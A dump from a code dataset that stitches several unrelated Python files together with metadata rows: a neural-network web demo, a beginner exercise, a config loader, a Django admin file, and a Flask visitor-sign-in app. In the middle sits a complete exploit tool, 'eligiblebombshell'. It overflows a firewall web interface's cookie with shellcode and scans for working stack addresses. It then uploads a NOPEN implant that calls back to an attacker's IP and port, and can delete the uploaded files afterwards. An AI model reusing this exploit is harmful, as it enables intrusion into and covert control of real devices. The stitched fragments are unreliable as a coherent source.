@aiohttp_jinja2.template('fit.html')
async def web_fit(request: web.Request):
imgs = request.match_info['imgs']
x = request.match_info['x']
y = request.match_info['y']
return {
'base_url': base_url,
'imgs': int(imgs),
'x': int(x),
'y': int(y),
}
@routes.post('/change')
async def change_dim(request: web.Request):
data = await request.post()
raise web.HTTPFound(location=f"{base_url}/fit/{data['imgs'] or IMGS}:{data['x'] or X}-{data['y'] or Y}")
def _create_images(x, y, imgs, data):
images = [[[-1 for _ in range(x)]
for _ in range(y)]
for img in range(imgs)]
for key in data.keys():
k, key = key.split(':')
i, j = key.split('-')
i, j, k = int(i), int(j), int(k)
images[k][j][i] = 1
return [vectorize(im) for im in images]
def _create_image(x, y, data):
image = [[-1 for _ in range(x)] for _ in range(y)]
for key in data.keys():
i, j = key.split('-')
i, j = int(i), int(j)
image[j][i] = 1
return vectorize(image)
@routes.post('/fit')
async def fit(request: web.Request):
data = await request.post()
data = MultiDict(data)
imgs = data.pop('imgs')
imgs = int(imgs)
# Проверяем количество образов
if imgs < 0:
raise web.HTTPBadRequest(text=f"Invalid images number: {imgs}")
x = data.pop('x')
x = int(x)
y = data.pop('y')
y = int(y)
# Проверяем размеры образов
if x * y < 15 or x * y > 50:
raise web.HTTPBadRequest(text=f"Invalid XY combination: X={x}, Y={y}, XY={x * y}")
# Создаем матрицы всех образов
images = _create_images(x, y, imgs, data)
token = secrets.token_hex(8)
networks[token] = ((x, y, imgs), images, fit_model(images))
raise web.HTTPFound(location=f"{base_url}/predict/{token}")
@routes.get('/weights/{token}')
async def get_weights(request: web.Request):
token = request.match_info['token']
raise web.HTTPOk(text=str(networks[token][-1]))
@routes.get('/predict/{token}')
@aiohttp_jinja2.template('predict.html')
async def web_predict(request: web.Request):
token = request.match_info['token']
randomize = request.url.query.get('randomize') or THRESH
try:
randomize = float(randomize)
except ValueError:
randomize = THRESH
if randomize < 0. or randomize > 1.:
raise web.HTTPBadRequest(text=f"Probability value exceeds [0, 1] limits: randomize={by}")
(x, y, imgs), images, weights = networks[token]
# Случайно изменяем образ, если опция была указана
if request.url.query.get('randomize'):
images = [[-val if random.random() < randomize else val
for val in im]
for im in images]
im_idx = random.randrange(0, imgs)
return {
'x': x,
'y': y,
'image': images[im_idx],
'token': token,
'randomize': randomize
}
@routes.post('/predict/{token}')
@aiohttp_jinja2.template('result.html')
async def predict(request: web.Request):
token = request.match_info['token']
data = await request.post()
(x, y, _), images, weights = networks[token]
image = _create_image(x, y, data)
output, state = model_predict(weights, images, image)
return {
'x': x,
'y': y,
'input': image,
'output': output,
'state': int(state)
}
def create():
app = web.Application()
app.add_routes(routes)
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader('lab07/templates'))
web.run_app(app, port=PORT)
if __name__ == '__main__':
create()
| 23.505682 | 108 | 0.603336 | 0 | 0 | 0 | 0 | 3,100 | 0.729069 | 2,788 | 0.655691 | 868 | 0.204139 |
a4e6cbc17c5cb30d02c5c8a3916b9fbf0b7665a7 | 343 | py | Python | ex6.py | EiPoPoAung/python_exercises | e7c7b67e0409f6680ea7f580e3d1b21d6f96248d | [
"MIT"
] | null | null | null | ex6.py | EiPoPoAung/python_exercises | e7c7b67e0409f6680ea7f580e3d1b21d6f96248d | [
"MIT"
] | null | null | null | ex6.py | EiPoPoAung/python_exercises | e7c7b67e0409f6680ea7f580e3d1b21d6f96248d | [
"MIT"
] | null | null | null | x="There are %d types of people."%10
binary="binary"
do_not="don't"
y="Those who know %s and those who %s."%(binary,do_not)
print(x)
print(y)
print("I said: '%s'."%y)
hilarious=False
joke_evaluation="Isn't that joke so funny?! %r"
print (joke_evaluation % hilarious)
w="This is the left side of ..."
e="a string with a right side"
print (w+e)
| 24.5 | 55 | 0.688047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.54519 |
a4e6ff7ac122d6aad3364816354813061bd2f7d4 | 627 | py | Python | logic/config.py | ssichynskyi/lotti-karotti-calc | 44eb39ce4c4bc8ddf4049d72268597c6d7411f84 | [
"Apache-2.0"
] | null | null | null | logic/config.py | ssichynskyi/lotti-karotti-calc | 44eb39ce4c4bc8ddf4049d72268597c6d7411f84 | [
"Apache-2.0"
] | null | null | null | logic/config.py | ssichynskyi/lotti-karotti-calc | 44eb39ce4c4bc8ddf4049d72268597c6d7411f84 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
from pathlib import Path
import yaml
class Config:
"""
Extracts the data from the configuration file given
"""
def __init__(self, path):
with open(path, 'r') as f:
contents = f.read()
self.options = yaml.safe_load(contents)
path_to_config = Path(__file__).parent.parent.joinpath('config', 'lotti_config.yaml')
if not path_to_config.exists():
# handle a case when pyinstaller compile everything in one executable file
path_to_config = Path(sys.argv[0]).parent.joinpath('config', 'lotti_config.yaml')
config = Config(path_to_config)
| 27.26087 | 85 | 0.682616 | 234 | 0.373206 | 0 | 0 | 0 | 0 | 0 | 0 | 221 | 0.352472 |
a4e76062bd271f3f1cc37a95b088bfcb694c00bc | 217 | py | Python | hs_modflow_modelinstance/admin.py | ResearchSoftwareInstitute/MyHPOM | 2d48fe5ac8d21173b1685eb33059bb391fe24414 | [
"BSD-3-Clause"
] | 1 | 2018-09-17T13:07:29.000Z | 2018-09-17T13:07:29.000Z | hs_modflow_modelinstance/admin.py | ResearchSoftwareInstitute/MyHPOM | 2d48fe5ac8d21173b1685eb33059bb391fe24414 | [
"BSD-3-Clause"
] | 100 | 2017-08-01T23:48:04.000Z | 2018-04-03T13:17:27.000Z | hs_modflow_modelinstance/admin.py | ResearchSoftwareInstitute/MyHPOM | 2d48fe5ac8d21173b1685eb33059bb391fe24414 | [
"BSD-3-Clause"
] | 2 | 2017-07-27T20:41:33.000Z | 2017-07-27T22:40:57.000Z | from mezzanine.pages.admin import PageAdmin
from django.contrib import admin
from hs_modflow_modelinstance.models import MODFLOWModelInstanceResource
admin.site.register(MODFLOWModelInstanceResource, PageAdmin)
| 36.166667 | 73 | 0.866359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a4e869698fe814d3a243ff2da3c5d64b703b2798 | 24,526 | py | Python | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 46 | 2017-05-15T11:15:08.000Z | 2018-07-02T03:32:52.000Z | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | null | null | null | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 24 | 2017-05-17T03:26:17.000Z | 2018-07-09T07:00:50.000Z | #!/usr/bin/python
import shellcode
import optparse
import httplib
import logging
import random
import socket
import sys
import re
from struct import pack, unpack
from time import sleep
########################
# Global configuration #
########################
DEFAULT_ETAG_FILE = "ELBO.config"
VERSION = "%prog v1.0.0.0"
####################################################################
# Add support for python 2.3 and 2.4 #
####################################################################
# 2.3 introduced Set, so anything older won't work anyway
# 2.4 introduced the set builtin, so anything newer works fine
if sys.version_info[0] <= 2 and sys.version_info[1] <= 3:
import sets
set = sets.Set
# "any" was introduced in 2.5
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
def any(iterable):
for e in iterable:
if e:
return True
return False
#####################
# Support functions #
#####################
def read_etag_file(options):
"""Returns a nested dictionary of the form:
{ etag-string: { "stack" : stack-address,
"version": software-version },
... }"""
tags = dict()
noserver = None
have_errors = False
options.scanplan = []
# split etag into its components
(inode, size, timestamp) = [int(x, 16) for x in options.etag.split("-")]
logging.info("Parsed ETag: inode=%d, filesize=%d, timestamp=%#x" %
(inode, size, timestamp))
fh = file(options.etag_file)
for line in [x.strip() for x in fh.readlines()]:
line = re.sub("\s*#.*", "", line) # remove trailing comments
if len(line) == 0: continue # skip blank lines
m1 = re.match("ETAG\s*=\s*(.+)", line)
m2 = re.match("NOSERVER\s*=\s*(.+)", line)
m3 = re.match("SCANPLAN\s*=\s*(.+)", line)
if not (m1 or m2 or m3):
print "ERROR: invalid line in etag file: [%s]" % line
have_errors = True
continue
if m1: # an "ETAG = ..." line
fields = dict(zip(["etag", "action", "stack", "version"],
[x.strip() for x in m1.group(1).split(":")]))
if len(fields) == 3:
fields["version"] = "unknown"
elif len(fields) != 4:
print "ERROR: invalid line in etag file: [%s]" % line
have_errors = True
continue
# skip actions that don't match the --action command line argument
if options.action not in fields["action"]:
logging.debug("Skipping configuration [%s:%s] due to --action" %
(fields["etag"], fields["action"]))
continue
# convert hex numbers to actual numbers (not strings)
if fields["stack"].startswith("0x"):
fields["stack"] = long(fields["stack"], 16)
if fields["etag"] not in tags:
tags[fields["etag"]] = []
tags[fields["etag"]].append(dict(action=fields["action"],
stack=fields["stack"],
version=fields["version"]))
elif m2: # a "NOSERVER = ..." line
noserver = m2.group(1)
elif m3: # a "SCANPLAN = ..." line
fields = dict(zip(["action","low","high","addrs"],
[x.strip() for x in m3.group(1).split(":")]))
if options.action not in fields["action"]:
logging.debug("Skipping scanplan [%s:%s:%s] due to --action" %
(fields["action"], fields["low"], fields["high"]))
continue
fields["low"] = long(fields["low"], 16)
fields["high"] = long(fields["high"], 16)
addrs = [x.strip() for x in fields["addrs"].split(",")]
addrs = [x.startswith("0x") and long(x,16) or x for x in addrs]
# if the etag we want to hit is in this SCANPLAN, add it
if timestamp >= fields["low"] and timestamp <= fields["high"]:
scanplan = [dict(action=fields["action"], stack=x)
for x in addrs]
if options.maxfailsaction > 0:
options.scanplan += scanplan[:options.maxfailsaction]
else:
options.scanplan += scanplan
fh.close()
if have_errors:
sys.exit(1)
return (tags, noserver)
def get_details_for_etag(options):
"""Get the stack address for a specific ETag from the configuration file."""
(tags, noserver) = read_etag_file(options)
if noserver and not options.noserver:
options.noserver = noserver
# strip off wacky W/ and quotes (if they're there)
m = re.match('(?:W/)?"?(.*)"?$', options.etag)
if m:
options.etag = m.group(1)
etag = options.etag
# look for an exact match
if etag in tags:
print "Found etag [%s] for version %s" % (etag,tags[etag][0]['version'])
return tags[etag]
# didn't find exact match - strip off the inode part and check again
short = etag[etag.index("-"):]
for t in tags:
if t.find(short) != -1:
print "Partial ETag match: [%s],[%s] for version %s" % \
(etag, t, tags[t][0]['version'])
return tags[t]
return None
def encode(string):
"""Encode string argument (XOR with a mask byte) to remove any
forbidden characters."""
bad = ['\x00', '\t', ' ', '\r', '\n']
start = random.randint(1, 255)
maskb = (start + 1) & 0xff
while maskb != start:
if chr(maskb) in bad:
maskb = (maskb + 1) & 0xff
continue
# mask all arguments
string = "".join(map(lambda x: chr(maskb ^ ord(x)), string))
# see if we got rid of all bad characters
if not any([x in string for x in bad]):
return (maskb, string)
# unmask for next try
string = "".join(map(lambda x: chr(maskb ^ ord(x)), string))
# incr mask
maskb = (maskb + 1) & 0xff
raise Exception("Could not find valid mask byte.")
def build_payload(options, address, libc):
"""Build the exploit cookie + post data payload."""
if options.op == "scan":
body = shellcode.probe
elif options.op == "nopen":
body = shellcode.nopen
# fill in noserver file length and callback ip/port
body = body[:2] + \
pack("<I", len(shellcode.tiny_exec)) + \
pack("<I", len(options.nopen)) + \
pack("35s", "D=-c%s" % options.callback_ip) + \
body[45:]
elif options.op == "cleanup":
body = shellcode.cleanup
else:
raise Exception("ERROR: Invalid operation specified.")
if libc:
cookie = shellcode.auth_id
bodylen = len(body)
if bodylen > 0xffff:
raise Exception("body must be <= 0xffff bytes long")
# fill in bodylen in auth_id shellcode
if (bodylen & 0xff00) == 0:
cookie = cookie[:10] + "\x90\x90" + cookie[12:]
else:
cookie = cookie[:11] + chr((bodylen & 0xff00) >> 8) + cookie[12:]
if (bodylen & 0xff) == 0:
cookie = cookie[:12] + "\x90\x90" + cookie[14:]
else:
cookie = cookie[:13] + chr(bodylen & 0xff) + cookie[14:]
if len(cookie) > 60:
raise Exception("ERROR: Cookie shellcode must be <= 60 bytes!")
cookie = "auth_id=" + chr(0x90)*(60 - len(cookie)) + cookie
cookie += pack("<I", address)
else:
decoder = shellcode.decoder
execute = shellcode.execute_post
exec_len = pack("<I", len(execute))
deco_len = pack("<I", len(decoder))
body_len = pack("<I", len(body))
# replace 0xdeadbeef with actual body length
execute = execute[:7] + body_len + execute[11:]
(maskb, string) = encode(execute + exec_len + deco_len)
execute = string[:-8]
exec_len = string[-8:-4]
deco_len = string[-4:]
maskw = chr(maskb)*4
decoder = decoder[0] + deco_len + decoder[5] + maskw + \
decoder[10:15] + exec_len + decoder[19:21] + maskw + \
decoder[25:29] + chr(maskb) + decoder[30:]
cookie = shellcode.finder + decoder + execute
if len(cookie) > 1036:
raise Exception("ERROR: Cookie shellcode must be <= 1036 bytes!")
sled_len = (1036 - len(cookie)) # 1036 = buffer len to overflow
logging.info("Using decoder masking byte %#x" % maskb)
logging.info("Using %d-byte NOP sled" % sled_len)
cookie = chr(0x90)*sled_len + cookie + pack("<I", address)
if options.op == "nopen":
return (cookie, body + options.nopen + shellcode.tiny_exec)
else:
return (cookie, body)
def get_response(options, address):
"""Send an exploit to the target and get its response."""
# some addresses are fake, so we remap them here
remap_addr = { 'libc.0': 0x0804a625L, 'libc.1': 0x2aab757c }
method = "GET"
if address["stack"] in remap_addr:
real_addr = remap_addr[address["stack"]]
(cookie, body) = build_payload(options, real_addr, libc=True)
else:
(cookie, body) = build_payload(options, address["stack"], libc=False)
conn = httplib.HTTPSConnection(options.target_ip, options.port)
if logging.getLogger().level <= logging.DEBUG:
if len(body) + len(cookie) > 10240:
logging.debug("WARNING: debug mode selected, but the amount of " +
"data being sent to the server is large (> 10kb). " +
"Temporarily disabling debug output.")
else:
conn.set_debuglevel(3)
logging.info("Sending %s request (%d-byte cookie) to https://%s:%s%s" %
(method, len(cookie), options.target_ip, options.port,
address["action"]))
try:
conn.request(method, address["action"], body=body,
headers={"Cookie": cookie})
except socket.error, e:
print "Connection error %d: %s" % tuple(e)
sys.exit(1)
return conn.getresponse()
####################
# "Main" functions #
####################
def scan(options):
"""Scan for which vulnerability / stack address to use"""
addrs = get_details_for_etag(options)
if addrs is None:
addrs = options.scanplan
if options.maxfails > 0:
addrs = addrs[:options.maxfails]
else:
logging.info("--scan initiated against a known version: Only " +
"sending one scan (expect success!)")
logging.debug("scanplan = [" +
",".join(["(%s, %s)" % (x["action"],
type(x["stack"]) == long and \
("%#010x" % x["stack"]) or \
x["stack"])
for x in addrs]) +
"]")
if len(addrs) == 0:
print "ERROR: No valid SCANPLAN found for your ETag. If you supplied an --action argument, try again without it. Otherwise, contact a developer."
return
skip_404 = dict() # CGI's that aren't on the target
for (i,addr) in enumerate(addrs):
logging.info("------------------------------------------------")
if type(addr["stack"]) == str:
print "Atmpt. %d of %d: Trying return to %s against %s" % \
(i+1, len(addrs), addr["stack"], addr["action"])
else:
print "Atmpt %d of %d: Trying stack addr %#010x against %s" % \
(i+1, len(addrs), addr["stack"], addr["action"])
cgi_name = addr["action"][:addr["action"].find("?")]
if cgi_name in skip_404:
logging.info("... skipped due to HTTP %d" % skip_404[cgi_name])
continue
resp = get_response(options, addr)
logging.info(" received HTTP %s %s" % (resp.status, resp.reason))
if resp.status == 200:
address = addr
break
if resp.status >= 300 and resp.status < 500:
skip_404[cgi_name] = resp.status
logging.info("Skipping all future scans against %s due to HTTP status" % cgi_name)
sleep(options.delay)
if resp.status != 200:
if len(addrs) == 1 and options.maxfails != 1:
print "ERROR: Vulnerability parameter recorded in %s FAILED." % \
options.etag_file
print " Try deleting the entry and running --scan again."
else:
print "All scans failed. No vulnerability found."
return
data = resp.read()
logging.debug("received data(%d): %s" % (len(data), repr(data)))
if len(data) < 16:
print "ERROR: Expected at least 16 bytes from exploit, but only " + \
"got %d" % len(data)
return
code_ack = 0xc0edbabeL
code_sudo = 0x900d50d0L
code_nosudo = 0xbad500d0L
code_root = 0xb00500d0L
code_exec = 0xbaade7ecL
(ack, stack, euid, sudo) = unpack("<IIII", data[:16])
if ack == code_ack:
data = data[16:]
print "Received ACK from exploit payload."
print "================================================="
print "Effective UID: %d" % euid
if sudo == code_sudo:
print "/tos/bin/sudo appears to be available."
print "Output of '/tos/bin/sudo /usr/bin/id':"
if unpack("<I", data[:4])[0] == code_exec:
print " ERROR: execve() failed!"
else:
print data
data = ""
elif sudo == code_nosudo:
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
print "/tos/bin/sudo is NOT available!"
print "May not be able to escalate privileges!"
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
elif sudo == code_root:
print "Already root, so skipping sudo check"
else:
print "Unknown sudo status: got %#x but expected %#x or %#x" % \
(sudo, code_sudo, code_nosudo)
if len(data):
print "Received unexpected data:", repr(data)
print "================================================="
if type(address["stack"]) == str:
print "Successful libc exploit."
config_line = " ETAG = %s : %s : %s" % \
(options.etag, address["action"], address["stack"])
else:
print "Successful probe stack address: %#010x" % address["stack"]
print "Exact stack address : %#010x" % stack
config_line = " ETAG = %s : %s : %#010x" % \
(options.etag, address["action"], stack)
if len(addrs) == 1:
print "Vulnerability for ETag [%s] confirmed!" % options.etag
else:
print "Add this line to %s:" % options.etag_file
print config_line
print "and then add the version column when known."
else:
print "ERROR! Received invalid ack word [%#x] vs [%#x]" % (ack,code_ack)
print "received (%d): %s" % (len(data), repr(data))
print "Exploit failed."
def nopen(options):
"""Upload noserver to the target and have it call back"""
addr = get_details_for_etag(options)
if addr is None:
logging.error("ERROR: No entry for ETag [%s] in %s." %
(options.etag, options.etag_file))
logging.error(" Perhaps you should run with --scan?")
return
if not options.noserver:
options.parser.error("--nopen also requires -n/--noserver or a " +
"NOSERVER entry in %s" % options.etag_file)
if not options.callback_ip:
options.parser.error("--nopen also requires -c/--callback!")
try:
fh = file(options.noserver)
options.nopen = fh.read()
fh.close()
except:
print "ERROR: Could not read noserver file [%s]" % (options.noserver)
return
codes = {
0xdeadbeefL: "Received ACK from exploit. Uploading NOPEN.",
0xc0edbabeL: "Uploaded NOPEN! Callback commencing.",
0x00000001L: "ERROR: Could not read POSTed NOPEN binary.",
0x00000002L: "ERROR: Could not write NOPEN binary to target disk.",
0x00000003L: "ERROR: Unexpected EOF while uploading NOPEN binary.",
0x00000004L: "ERROR: Could not open() upload filename on target.",
0x00000005L: "ERROR: exeve() on uploaded NOPEN binary failed.",
0x00000006L: "warning: Could not close() uploaded file on target. Continuing anyway. (Is there another NOPEN session already alive?)",
0x00000007L: "warning: sudo failed! Running NOPEN as nobody.",
}
resp = get_response(options, addr[0])
while True:
try:
data = resp.read(4)
except ValueError:
break
if len(data) == 0:
break
logging.debug("received data(%d): %s" % (len(data), repr(data)))
code = unpack("<I", data)[0]
if code in codes:
print codes[code]
else:
print "ERROR: Unknown status code %#010x" % code
data += resp.read()
print data
break
def cleanup(options):
"""Try to delete uploaded files from the target"""
# extract uploaded filenames from shellcode
null0 = shellcode.cleanup.index("\x00")
null1 = shellcode.cleanup.index("\x00", null0+1)
noserver_upload = shellcode.cleanup[2:null0]
tinyexec_upload = shellcode.cleanup[null0+1:null1]
codes = {
0x00000002L: "ERROR: unlink('%s') (%s) - cleanup NOT successful - file is still sitting on target!",
0x00000100L: "success: stat('%s') (%s) - file is sitting on target",
0x00000200L: "success: unlink('%s') (%s) - file removed from target",
}
masks = {
0x00010000L: (noserver_upload, 'noserver'),
0x00020000L: (tinyexec_upload, 'tiny-exec'),
}
orig_codes = codes.keys()
for m in masks:
for c in orig_codes:
codes[m ^ c] = codes[c] % masks[m]
for c in orig_codes:
del codes[c]
codes[0x00010001L] = "warning: stat() on '%s' (noserver) failed - file not uploaded? This may be normal if the exploit upload failed or the file was deleted manually." % noserver_upload
codes[0x00020001L] = "warning: stat() on '%s' (tiny-exec) failed - file not uploaded? This may be normal if the exploit upload failed, the file was deleted manually, or we did not need to upload tiny-exec (i.e., we were already running as EUID root)." % tinyexec_upload
addr = get_details_for_etag(options)
if addr is None:
logging.error("ERROR: No entry for ETag [%s] in %s." %
(options.etag, options.etag_file))
logging.error(" Perhaps you should run with --scan?")
return
resp = get_response(options, addr[0])
data = resp.read()
logging.debug("received data(%d): %s" % (len(data), repr(data)))
if len(data) % 4 != 0:
print "ERROR: Expected 4-byte status codes but got %d bytes:"%len(data)
print repr(data)
return
from_exploit = unpack("<" + ("I" * (len(data)/4)), data)
for code in from_exploit:
if code in codes:
print codes[code]
else:
print "ERROR: Unknown status code %#010x" % code
def main():
"""Parse command line arguments"""
def handle_op_arg(option, opt_str, value, parser, opname):
if parser.values.op:
raise optparse.OptionValueError(
"Only one of --probe, --scan, --nopen, or --cleanup should " +
"be supplied")
parser.values.op = opname
parser = optparse.OptionParser(version=VERSION, usage="""%prog [options]
See -h for specific options (some of which are required).
Examples:
Scan to find (unknown versions) or confirm (known versions) vulnerability:
%prog -t 1.2.3.4 -e 012-345-6789 --scan -v
Once a valid entry is in ELBO.config, upload nopen:
%prog -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v
Delete uploaded files from the previous step:
%prog -t 1.2.3.4 -e 012-345-6789 --cleanup -v""")
parser.add_option("-t", "--target-ip", dest="target_ip", action="store",
type="string", help="Target's IP address")
parser.add_option("-e", "--etag", dest="etag", action="store",
type="string", help="Target's ETag string")
parser.add_option("--scan", dest="op", action="callback",
callback=handle_op_arg, callback_args=("scan",),
help="Scan for vulnerability parameters")
parser.add_option("--delay", dest="delay", action="store", type="int",
default=1, help="Delay in seconds between probes " +
"during --scan (default=1 second)")
parser.add_option("-f", "--max-fails", dest="maxfails", action="store",
type="int", default=0, help="Total maximum number of " +
"failed scan attempts before aborting (default=0, run " +
"all scans); see also --max-fails-action")
parser.add_option("--max-fails-action", dest="maxfailsaction",
action="store", type="int", default=0, help="Maximum " +
"number of failed scan attempts on a single target " +
"CGI action before moving on to the next (default=0, " +
"run all scans)")
parser.add_option("--nopen", dest="op", action="callback",
callback=handle_op_arg, callback_args=("nopen",),
help="Upload NOPEN to target (requires -n and -c)")
parser.add_option("-n", "--noserver", dest="noserver", action="store",
type="string", help="Path to static noserver binary " +
"(overrides NOSERVER setting in %s)" % DEFAULT_ETAG_FILE)
parser.add_option("-c", "--callback", dest="callback_ip", action="store",
type="string", help="Callback IP:Port for --nopen " +
"(e.g., 127.0.0.1:12345")
parser.add_option("--cleanup", dest="op", action="callback",
callback=handle_op_arg, callback_args=("cleanup",),
help="Try to delete uploaded files from target")
parser.add_option("-p", "--port", dest="port", action="store", type="int",
default=443, help="Destination port (default=443)")
parser.add_option("--config", dest="etag_file", action="store",
type="string", default=DEFAULT_ETAG_FILE,
help="ETag configuration file (default=%s)" %
DEFAULT_ETAG_FILE)
parser.add_option("-v", "--verbose", dest="verbose", action="store_true",
help="Turn on verbose output")
parser.add_option("-d", "--debug", dest="debug", action="store_true",
help="Turn on debugging output")
parser.add_option("--action", dest="action", action="store", type="string",
default="", help="Only try actions from ELBO.config " +
"that contain ACTION as a substring")
(options, args) = parser.parse_args()
if len(args) != 0:
parser.error("invalid arguments")
# make sure we have a target IP and his ETag
if not options.target_ip:
parser.error("-t/--target-ip is required!")
if not options.etag:
parser.error("-e/--etag is required!")
# handle -v and -d via logging module
level = logging.ERROR
if options.verbose:
level = logging.INFO
if options.debug:
level = logging.DEBUG
logging.basicConfig()
logging.getLogger().setLevel(level)
logging.getLogger().handlers[0].setFormatter(logging.Formatter("%(msg)s"))
options.parser = parser
# dispatch to the correct operation
if not options.op:
parser.error("One of --scan, --nopen, or --cleanup must " +
"be supplied")
dispatch = dict()
for func in [scan, nopen, cleanup]:
dispatch[func.func_name] = func
dispatch[options.op](options)
return
if __name__ == '__main__':
main()
| 39.430868 | 273 | 0.544157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,939 | 0.36447 |
a4e8d966c41d61cf7973a0faa9d826fdc0196a65 | 8,716 | py | Python | edu_visitor/visitor_logs/routes.py | covrebo/edu_visitor | 2759519eef97057ca01ed26f556ab335167fe084 | [
"MIT"
] | null | null | null | edu_visitor/visitor_logs/routes.py | covrebo/edu_visitor | 2759519eef97057ca01ed26f556ab335167fe084 | [
"MIT"
] | null | null | null | edu_visitor/visitor_logs/routes.py | covrebo/edu_visitor | 2759519eef97057ca01ed26f556ab335167fe084 | [
"MIT"
] | null | null | null | from flask import Blueprint, render_template, url_for, session, flash, redirect, request
from edu_visitor import db
from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm
from edu_visitor.models import StudentLog, VisitorLog
from flask_login import login_required
visitor_logs = Blueprint('visitor_logs', __name__)
# Route to the sign-in page for students
@visitor_logs.route('/student-signin', methods=['GET', 'POST'])
def student_signin():
form = StudentSignInForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = StudentLog(student_name=form.student_name.data, grade=form.grade.data, parent_name=form.parent.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='In')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed in to { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('student-signin.html', title='Student Sign-in', form=form)
# Route to the sign-out page for students
@visitor_logs.route('/student-signout', methods=['GET', 'POST'])
def student_signout():
form = StudentSignOutForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = StudentLog(student_name=form.student_name.data, grade=form.grade.data, parent_name=form.parent.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='Out')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed out of { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('student-signout.html', title='Student Sign-out', form=form)
# Route to the sign-in page for visitors
@visitor_logs.route('/visitor-signin', methods=['GET', 'POST'])
def visitor_signin():
form = VisitorSignInForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = VisitorLog(visitor_name=form.visitor_name.data, student_name=form.student_name.data, grade=form.grade.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='In')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed in to { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('visitor-signin.html', title='Visitor Sign-in', form=form)
# Route to the sign-out page for visitors
@visitor_logs.route('/visitor-signout', methods=['GET', 'POST'])
def visitor_signout():
form = VisitorSignOutForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = VisitorLog(visitor_name=form.visitor_name.data, building=session['site'], direction='Out')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed out of { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('visitor-signout.html', title='Visitor Sign-out', form=form)
# Route to display a summary of the day's student sign-ins and sign-outs
@visitor_logs.route('/daily-summary')
@login_required
def daily_summary():
# TODO: Create DB calls to create the dictionaries only for the current day
# Query database for student visitor logs entering the building and get the correct page to display from the URL
student_page_in = request.args.get('student_page_in', 1, type=int)
student_log_in = StudentLog.query.order_by(StudentLog.id.desc()).filter_by(direction='In', building=session['site']).paginate(page=student_page_in, per_page=5)
# Query database for student visitor logs leaving the building
student_page_out = request.args.get('student_page_out', 1, type=int)
student_log_out = StudentLog.query.order_by(StudentLog.id.desc()).filter_by(direction='Out', building=session['site']).paginate(page=student_page_out, per_page=5)
# Query database for visitor logs entering the building
visitor_page_in = request.args.get('visitor_page_in', 1, type=int)
visitor_log_in = VisitorLog.query.order_by(VisitorLog.id.desc()).filter_by(direction='In', building=session['site']).paginate(page=visitor_page_in, per_page=5)
# Query database for visitor logs leaving the building
visitor_page_out = request.args.get('visitor_page_out', 1, type=int)
visitor_log_out = VisitorLog.query.order_by(VisitorLog.id.desc()).filter_by(direction='Out', building=session['site']).paginate(page=visitor_page_out, per_page=5)
return render_template('daily-summary.html', student_log_in=student_log_in, student_log_out=student_log_out, visitor_log_in=visitor_log_in, visitor_log_out=visitor_log_out, title='Daily Summary')
# A route to view a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>')
@login_required
def view_student_signin(post_id):
post = StudentLog.query.get_or_404(post_id)
return render_template('student-view.html', title="Update Entry", post=post)
# A route to update a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/update', methods=['GET', 'POST'])
@login_required
def update_student_signin(post_id):
post = StudentLog.query.get_or_404(post_id)
form = StudentUpdateForm()
if form.validate_on_submit():
post.student_name = form.student_name.data
post.grade = form.grade.data
post.parent_name = form.parent.data
post.reason = form.reason.data
post.reason_other = form.reason_other.data
post.direction = form.direction.data
db.session.commit()
flash("Your post has been updated.", 'success')
return redirect(url_for('visitor_logs.daily_summary'))
# Pre-populate the form
elif request.method == 'GET':
form.student_name.data = post.student_name
form.grade.data = post.grade
form.parent.data = post.parent_name
form.reason.data = post.reason
form.reason_other.data = post.reason_other
form.direction.data = post.direction
return render_template('student-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_student_signin(post_id):
post = StudentLog.query.get_or_404(post_id)
db.session.delete(post)
db.session.commit()
flash('The entry has been deleted.', category='success')
return redirect(url_for('visitor_logs.daily_summary'))
# A route to view a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>')
@login_required
def view_visitor_signin(post_id):
post = VisitorLog.query.get_or_404(post_id)
return render_template('visitor_logs.visitor-view.html', title="Update Entry", post=post)
# A route to update a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>/update', methods=['GET', 'POST'])
